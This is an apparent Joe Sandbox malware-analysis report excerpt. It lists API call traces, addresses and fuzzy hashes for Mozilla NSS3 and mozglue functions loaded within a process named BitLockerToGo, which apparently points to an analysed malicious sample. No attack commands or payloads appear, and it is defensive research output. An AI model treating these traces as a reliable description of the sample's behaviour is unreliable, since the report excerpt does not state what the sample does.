                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93B1A2
                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93B1AA
                                                                                                                                                      • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C91AB95,00000000,?,00000000,00000000,00000000), ref: 6C93B1C2
                                                                                                                                                        • Part of subcall function 6C961560: TlsGetValue.KERNEL32(00000000,?,6C930844,?), ref: 6C96157A
                                                                                                                                                        • Part of subcall function 6C961560: EnterCriticalSection.KERNEL32(?,?,?,6C930844,?), ref: 6C96158F
                                                                                                                                                        • Part of subcall function 6C961560: PR_Unlock.NSS3(?,?,?,?,6C930844,?), ref: 6C9615B2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4188828017-0
                                                                                                                                                      • Opcode ID: 15398cd8765fc938bf1d9df4c6b5d5e82b2810cccf771ac5be7a4d679265d1c2
                                                                                                                                                      • Instruction ID: 2e4b53de941a900d0328d1fa6bd46bf5bb5841227373bc684a5797d25bff35d7
                                                                                                                                                      • Opcode Fuzzy Hash: 15398cd8765fc938bf1d9df4c6b5d5e82b2810cccf771ac5be7a4d679265d1c2
                                                                                                                                                      • Instruction Fuzzy Hash: 2AA1F2B1D00216ABEF019FA4DC41BEA77B4FF29308F104128E909A7751EB35EA55CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98ADB1
                                                                                                                                                        • Part of subcall function 6C96BE30: SECOID_FindOID_Util.NSS3(6C92311B,00000000,?,6C92311B,?), ref: 6C96BE44
                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C98ADF4
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C98AE08
                                                                                                                                                        • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C98AE25
                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C98AE63
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C98AE4D
                                                                                                                                                        • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                        • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                        • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98AE93
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C98AECC
                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C98AEDE
                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C98AEE6
                                                                                                                                                      • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C98AEF5
                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C98AF16
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                      • String ID: security
                                                                                                                                                      • API String ID: 3441714441-3315324353
                                                                                                                                                      • Opcode ID: 0df0479caa201b954a5b76e7585e2f82baf581e7f6b54a94a7471e1bf7493ec6
                                                                                                                                                      • Instruction ID: 69f1933b8b78f4097cc7c7aeff5d84eabf67a92327f09d6f5b7afa19c1b1ac7e
                                                                                                                                                      • Opcode Fuzzy Hash: 0df0479caa201b954a5b76e7585e2f82baf581e7f6b54a94a7471e1bf7493ec6
                                                                                                                                                      • Instruction Fuzzy Hash: F4412CB1806210ABEB214A189C45BAB32B8AF6130CF540D25E85497FC2FF39D559C6F3
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?), ref: 6C928E22
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C928E36
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C928E4F
                                                                                                                                                      • calloc.MOZGLUE(00000001,?,?,?), ref: 6C928E78
                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C928E9B
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C928EAC
                                                                                                                                                      • PL_ArenaAllocate.NSS3(?,?), ref: 6C928EDE
                                                                                                                                                      • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C928EF0
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C928F00
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C928F0E
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C928F39
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C928F4A
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C928F5B
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C928F72
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C928F82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1569127702-0
                                                                                                                                                      • Opcode ID: 3044ffb2c4c38ebe9ad5e04ae4ff543c413fd4d9adc08726b6dfdc8e7c0d0c0a
                                                                                                                                                      • Instruction ID: 15cd71ec708ec8053f9b4966811a556b923586f3cf66505da598626ac14100a6
                                                                                                                                                      • Opcode Fuzzy Hash: 3044ffb2c4c38ebe9ad5e04ae4ff543c413fd4d9adc08726b6dfdc8e7c0d0c0a
                                                                                                                                                      • Instruction Fuzzy Hash: 1B5159B3D102119FEB149F28CC849AAB7B9FF55318F188129EC489BB00E739ED4587D0
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C95EE0B
                                                                                                                                                        • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                        • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EEE1
                                                                                                                                                        • Part of subcall function 6C951D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C951D7E
                                                                                                                                                        • Part of subcall function 6C951D50: EnterCriticalSection.KERNEL32(?), ref: 6C951D8E
                                                                                                                                                        • Part of subcall function 6C951D50: PR_Unlock.NSS3(?), ref: 6C951DD3
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C95EE51
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C95EE65
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C95EEA2
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C95EEBB
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C95EED0
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C95EF48
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C95EF68
                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C95EF7D
                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C95EFA4
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C95EFDA
                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C95F055
                                                                                                                                                      • free.MOZGLUE(?), ref: 6C95F060
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2524771861-0
                                                                                                                                                      • Opcode ID: 06e7214b420ae5b7f6da6a0480e9f07f3e3ee14bbcea675fb5bab58422749586
                                                                                                                                                      • Instruction ID: 6ee1d606f5e7b22edc5efa259fe7d576fa2458235a00b9ba4797462b8c5a7ddd
                                                                                                                                                      • Opcode Fuzzy Hash: 06e7214b420ae5b7f6da6a0480e9f07f3e3ee14bbcea675fb5bab58422749586
                                                                                                                                                      • Instruction Fuzzy Hash: 288181B1E00209ABDF01DF65DC85AEE7BB9BF19318F544024ED19A3711E736E924CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • PK11_SignatureLen.NSS3(?), ref: 6C924D80
                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6C924D95
                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C924DF2
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C924E2C
                                                                                                                                                      • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C924E43
                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C924E58
                                                                                                                                                      • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C924E85
                                                                                                                                                      • DER_Encode_Util.NSS3(?,?,6CA705A4,00000000), ref: 6C924EA7
                                                                                                                                                      • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C924F17
                                                                                                                                                      • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C924F45
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C924F62
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C924F7A
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C924F89
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C924FC8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2843999940-0
                                                                                                                                                      • Opcode ID: 056df50ca82908a0007e022de2d42334970dc8bf9859d9fd5e8b08b8f9e6b308
                                                                                                                                                      • Instruction ID: 88de61b92f677635ccabffd4b7e8712b6df609ae2f64e0ede347f8f586758043
                                                                                                                                                      • Opcode Fuzzy Hash: 056df50ca82908a0007e022de2d42334970dc8bf9859d9fd5e8b08b8f9e6b308
                                                                                                                                                      • Instruction Fuzzy Hash: 0081C0B1918301AFE711CF24D840B9BB7E8AB94308F14852DF998DB644E735E914CF92
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C84D4F0
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D4FC
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D52A
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C84D530
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D53F
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D55F
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C84D585
                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C84D5D3
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C84D5F9
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D605
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D652
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C84D658
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D667
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D6A2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2206442479-0
                                                                                                                                                      • Opcode ID: 0255e3f880d46f8e11db843fdaa2752a69ec00a15a269acf662e788e2246c646
                                                                                                                                                      • Instruction ID: 651e0dc9b18936324d3cb327fae5c8f0d5062ed1427013808ed959d8a297e9a2
                                                                                                                                                      • Opcode Fuzzy Hash: 0255e3f880d46f8e11db843fdaa2752a69ec00a15a269acf662e788e2246c646
                                                                                                                                                      • Instruction Fuzzy Hash: 27517271604709DFC714DF34C588AAABBF5FF89318F10892EE85A87711EB30A945CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C95781D,00000000,6C94BE2C,?,6C956B1D,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C40
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C95781D,?,6C94BE2C,?), ref: 6C956C58
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C95781D), ref: 6C956C6F
                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C956C84
                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C956C96
                                                                                                                                                        • Part of subcall function 6C901240: TlsGetValue.KERNEL32(00000040,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901267
                                                                                                                                                        • Part of subcall function 6C901240: EnterCriticalSection.KERNEL32(?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C90127C
                                                                                                                                                        • Part of subcall function 6C901240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C901291
                                                                                                                                                        • Part of subcall function 6C901240: PR_Unlock.NSS3(?,?,?,?,6C90116C,NSPR_LOG_MODULES), ref: 6C9012A0
                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C956CAA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                      • API String ID: 4221828374-3736768024
                                                                                                                                                      • Opcode ID: 971addf34ca16c23afbb2e3dafe98d33b9a143ff98c47f60492a7a145521759c
                                                                                                                                                      • Instruction ID: 3fc62b613371a6087854da790368cad341e942cbc8c82cc938d7bbf47b12c667
                                                                                                                                                      • Opcode Fuzzy Hash: 971addf34ca16c23afbb2e3dafe98d33b9a143ff98c47f60492a7a145521759c
                                                                                                                                                      • Instruction Fuzzy Hash: D801A7E17023522FEB00277AAE49F26356CAF8115DF948431FF04E0A42EAA6D57581B5
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetErrorText.NSS3(00000000,00000000,?,6C9278F8), ref: 6C964E6D
                                                                                                                                                        • Part of subcall function 6C9009E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C9006A2,00000000,?), ref: 6C9009F8
                                                                                                                                                        • Part of subcall function 6C9009E0: malloc.MOZGLUE(0000001F), ref: 6C900A18
                                                                                                                                                        • Part of subcall function 6C9009E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C900A33
                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C9278F8), ref: 6C964ED9
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C957703,?,00000000,00000000), ref: 6C955942
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C957703), ref: 6C955954
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C95596A
                                                                                                                                                        • Part of subcall function 6C955920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C955984
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C955999
                                                                                                                                                        • Part of subcall function 6C955920: free.MOZGLUE(00000000), ref: 6C9559BA
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C9559D3
                                                                                                                                                        • Part of subcall function 6C955920: free.MOZGLUE(00000000), ref: 6C9559F5
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C955A0A
                                                                                                                                                        • Part of subcall function 6C955920: free.MOZGLUE(00000000), ref: 6C955A2E
                                                                                                                                                        • Part of subcall function 6C955920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C955A43
                                                                                                                                                      • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964EB3
                                                                                                                                                        • Part of subcall function 6C964820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C964EB8,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C96484C
                                                                                                                                                        • Part of subcall function 6C964820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C964EB8,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C96486D
                                                                                                                                                        • Part of subcall function 6C964820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C964EB8,?), ref: 6C964884
                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964EC0
                                                                                                                                                        • Part of subcall function 6C964470: TlsGetValue.KERNEL32(00000000,?,6C927296,00000000), ref: 6C964487
                                                                                                                                                        • Part of subcall function 6C964470: EnterCriticalSection.KERNEL32(?,?,?,6C927296,00000000), ref: 6C9644A0
                                                                                                                                                        • Part of subcall function 6C964470: PR_Unlock.NSS3(?,?,?,?,6C927296,00000000), ref: 6C9644BB
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964F16
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964F2E
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964F40
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964F6C
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964F80
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C964F8F
                                                                                                                                                      • PK11_UpdateSlotAttribute.NSS3(?,6CA3DCB0,00000000), ref: 6C964FFE
                                                                                                                                                      • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C96501F
                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C9278F8), ref: 6C96506B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560490210-0
                                                                                                                                                      • Opcode ID: a8aef8d84598f1d14dd6d24191348824af07469208a4bd0615f1ede522cf9d9d
                                                                                                                                                      • Instruction ID: 613f191213c11c52753cc1d5f535207644671e15f1f8d4f1d61bbb47466820d4
                                                                                                                                                      • Opcode Fuzzy Hash: a8aef8d84598f1d14dd6d24191348824af07469208a4bd0615f1ede522cf9d9d
                                                                                                                                                      • Instruction Fuzzy Hash: 8451F5B5900212DBFB019F66DC016AB36B4BF2531CF144635E84A46F92F731D565CBA2
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
